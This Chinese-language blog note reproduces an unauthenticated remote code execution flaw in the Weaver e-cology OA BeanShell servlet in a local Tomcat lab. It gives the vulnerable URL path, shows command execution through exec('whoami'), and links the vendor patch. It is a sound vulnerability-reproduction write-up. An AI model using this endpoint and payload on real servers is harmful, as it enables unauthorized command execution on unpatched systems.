泛微e-cology OA Beanshell组件远程代码执行漏洞复现

• 2019 年 10 月 7 日
• 筆記

0X1 漏洞概述

泛微e-cologyOA协同商务系统是专为大中型企业制作的OA办公系统，支持PC端、移动端和微信端同时办公，完美的解决了距离的问题，内置大量智能化办公工具，让各部门之间的协作变得畅通而又简单，是中大型企业办公的必备神器。

泛微e-cology依托全新的设计理念,全新的管理思想为中大型组织创建全新的高效协同办公环境，让组织内部的沟通协助畅通无阻！为组织构建一个内部的baidu进行知识分享，让组织内部的制度流程落地有效执行，让组织内的信息能够自动找人，满足各类岗位的办公所需！

2019年9月17日，泛微OA更新了一个安全问题，修复了一个远程代码执行漏洞。泛微 e-cology OA 系统自带 BeanShell 组件且开放未授权访问，攻击者调用 BeanShell 组件接口可直接在目标服务器上执行任意命令。

漏洞影响版本

泛微e-cology<=9.0

0X2 环境搭建

由于e-cology是在云端，因此找了很多的安装包都是e-office，还花了点冤枉钱，而e-office是PHP代码的，所以小伙伴们就不要花费冤枉钱和时间去寻找漏洞版本的安装包了。

官方在官网上已经发布了补丁公告了，因此在线使用测试的版本肯定也已经修复漏洞了，最后经过不断寻找，在github上发现已经有其他研究人员通过此次漏洞的源头组件Beanshell已经写好了一个demo，对于像我这样不擅长代码的人简直是福音啊

demo下载链接如下

https://github.com/jas502n/e-cology

下载完成之后，将weaver.war复制到tomcat的webapp目录中

tomcat的环境配置就不介绍了，不会的同学请自行度娘。

然后启动tomcat

浏览器访问环境

http://127.0.0.1:8080/weaver    #ip:port/weaver

这样环境就已经搭建好了

0X3 漏洞利用

点击首页的Go to the BeanShell servlet会跳转到漏洞触发页面

http://127.0.0.1:8080/weaver/bsh.servlet.BshServlet

在Script标签位置处执行命令，点击下面的Evaluate即可执行

exec("whoami")

当前用户是管理员账号

命令执行成功。

0X4 漏洞修复

官网已经发布了最新的补丁包，下载链接

https://www.weaver.com.cn/cs/securityDownload.asp

参考使用手册更新即可。

0X5 参考链接

https://github.com/jas502n/e-cology  https://www.weaver.com.cn/cs/securityDownload.asp  https://www.cnblogs.com/Oran9e/p/11566824.html  https://blog.csdn.net/sun1318578251/article/details/101117946